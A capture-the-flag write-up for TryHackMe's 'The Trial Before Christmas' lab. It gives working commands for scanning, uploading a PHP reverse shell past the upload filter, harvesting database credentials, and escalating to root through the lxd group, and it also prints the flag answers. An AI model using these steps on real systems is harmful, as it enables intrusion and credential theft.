Try Hack Me
  • Try Hack Me
  • Rooms
  • Tutorial
    • Welcome to TryHackMe
    • Welcome
    • Tutorial
    • Starting Out In Cyber Sec
    • Welcome
  • Capture The Flag
    • Advent of Cyber
      • Task 1 - 10
      • Task 11 - 20
      • Task 21 - 29
      • PDF - materials
    • Anonymous
    • Mnemonic
    • Bounty Hacker
    • Ignite
    • Pickle Rick
    • Simple CTF
    • Agent Sudo
    • Mr. Robot
  • Advent of Cyber II
    • A Christmas Crisis
    • The Elf Strikes Back!
    • Christmas Chaos
    • Santa's watching
    • Someone stole Santa's gift list!
    • Be careful with what you wish on a Christmas night
    • The Grinch Really Did Steal Christmas
    • What's Under the Christmas Tree?
    • Anyone can be Santa!
    • Don't be sElfish!
    • The Rogue Gnome
    • Ready, set, elf.
    • Coal for Christmas
    • Where's Rudolph?
    • There's a Python in my stocking!
    • Help! Where is Santa?
    • ReverseELFneering
    • The Bits of Christmas
    • The Naughty or Nice List
    • PowershELlF to the rescue
    • Time for some ELForensics
    • Elf McEager becomes CyberElf
    • The Grinch strikes again!
    • The Trial Before Christmas
    • Thank You
  • Linux
    • Linux Fundamentals Part 1
    • Linux Fundamentals Part 2
    • Linux Fundamentals Part 3
    • LinuxCTF - Linux Challenges
    • Learn Linux - wip
    • Find - wip
  • Windows
    • Intro to Windows
  • OSINT
    • Introductory Researching - wip
    • Google Dorking
    • OhSINT
    • Sublist3r
    • Searchlight - IMINT
    • Geolocating Images
  • Crypto
    • Hashing - Crypto 101
    • Encryption - Crypto 101
    • CrackTheHash - wip
  • Network
    • Introductory Networking
    • Nmap
    • Network Services - wip
    • Network Services 2 - wip
    • Networking - wip
    • Nmap - wip
    • TOR
  • Web
    • Web Fundamentals
  • Pentest
    • Pentest questionaire
  • Hardware
    • Dumping Router Firmware
  • HELP
  • Reverse
    • Reversing ELF
Powered by GitBook
On this page
  • Video
  • Resources
  • Challenges
  • Scan the machine. What ports are open?
  • What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.
  • What is the name of the hidden php page?
  • What is the name of the hidden directory where file uploads are saved?
  • Bypass the filters. Upload and execute a reverse shell.
  • What is the value of the web.txt flag?
  • Upgrade and stabilize your shell.
  • Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password
  • Access the database and discover the encrypted credentials. What is the name of the database you find these in?
  • Crack the password. What is it?
  • Use su to login to the newly discovered user by exploiting password reuse.
  • What is the value of the user.txt flag?
  • Check the user's groups. Which group can be leveraged to escalate privileges?
  • Abuse this group to escalate privileges to root.
  • What is the value of the root.txt flag?

Was this helpful?

  1. Advent of Cyber II

The Trial Before Christmas

Web

PreviousThe Grinch strikes again!NextThank You

Last updated 4 years ago

Was this helpful?

Video

Resources

Challenges

Scan the machine. What ports are open?

nmap -sC -sV -T5 -p1-65535 10.10.243.219

80, 65000

What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.

gobuster dir -u http://10.10.243.219 -w /usr/share/dirb/wordlists/common.txt
gobuster dir -u http://10.10.243.219:65000 -w /usr/share/dirb/wordlists/common.txt -x php -t 50

Light Cycle

What is the name of the hidden php page?

gobuster dir -u http://10.10.243.219:65000 -w /usr/share/dirb/wordlists/common.txt -x php -t 50

uploads.php

What is the name of the hidden directory where file uploads are saved?

grid

Bypass the filters. Upload and execute a reverse shell. 

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

mv php-reverse-shell.php image.jpeg.php

No answer needed

What is the value of the web.txt flag?

THM{ENTER_THE_GRID}

Upgrade and stabilize your shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + Z
stty raw -echo; fg

No answer needed

Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password

cd /var/www/
cd TheGrid
cd includes
cat dbauth.php

tron:IFightForTheUsers

Access the database and discover the encrypted credentials. What is the name of the database you find these in?

mysql -u tron -p
IFightForTheUsers
show databases;
use tron;

tron

Crack the password. What is it?

@computer@

Use su to login to the newly discovered user by exploiting password reuse.

No naswer needed

What is the value of the user.txt flag?

THM{IDENTITY_DISC_RECOGNISED}

Check the user's groups. Which group can be leveraged to escalate privileges?

id
group

lxd

Abuse this group to escalate privileges to root.

lxc image list
lxc init Alpine strongbad -c security.privileged=true
lxc config device add strongbad trogdor disk source=/ path=/mnt/root recursive=true
lxc start strongbad
lxc exec strongbad /bin/sh

No answer needed

What is the value of the root.txt flag?

THM{FLYNN_LIVES}

LogoHash Type Identifier - Identify unknown hashes